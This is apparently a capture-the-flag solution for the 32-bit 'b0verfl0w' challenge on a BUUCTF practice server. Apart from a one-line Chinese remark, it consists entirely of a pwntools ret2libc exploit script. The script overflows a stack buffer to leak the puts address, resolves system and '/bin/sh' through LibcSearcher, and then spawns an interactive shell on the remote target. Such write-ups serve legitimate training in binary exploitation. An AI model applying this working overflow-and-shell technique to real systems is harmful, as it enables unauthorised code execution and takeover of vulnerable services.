ret2libc 做的。
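from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

# Local-debugging alternatives kept for reference; the remote target is used below.
# libc = ELF('libc-2.232.so')
# io = process('./b0verfl0w')
io = remote("node4.buuoj.cn", 28118)
elf = ELF('./b0verfl0w')


def debug():
    """Attach gdb to the running target and pause until the user continues."""
    gdb.attach(io)
    pause()


# Stage 1: leak the runtime address of puts.
# The chain calls puts@plt with puts@got as its argument and returns into
# main, so the program prints the GOT entry and then shows the prompt again.
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0804850E  # fixed address of main (page-given; implies a non-PIE binary)

io.recvuntil(b"What's your name?")
# 0x24 bytes of padding reach the saved return address; then the call chain.
payload = b'a' * 0x24 + p32(puts_plt) + p32(main_addr) + p32(puts_got)
io.sendline(payload)

# puts writes the little-endian GOT entry up to its first NUL byte. Reading up
# to the 0xf7 high byte assumes the 32-bit libc mapping lives at 0xf7xxxxxx;
# the last four bytes received are then the leaked pointer. A bytes literal is
# used on purpose: a str here only works through pwntools' text-to-bytes
# heuristic (which also emits a warning) and would break under a different
# context.encoding.
puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
print(hex(puts_addr))

# Stage 2: derive system and "/bin/sh" from the leak.
# With a local libc the same result would be:
#   system_addr = puts_addr - libc.sym['puts'] + libc.sym['system']
# LibcSearcher instead looks the leaked offset up in its libc database; when
# more than one libc matches it prompts for a choice, so this run is not fully
# unattended and a wrong pick yields wrong addresses.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

io.recvuntil(b"What's your name?")
# Same padding, then system(bin_sh) with a dummy (0) return address.
payload = b'a' * 0x24 + p32(system_addr) + p32(0) + p32(bin_sh_addr)
io.sendline(payload)
io.interactive()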
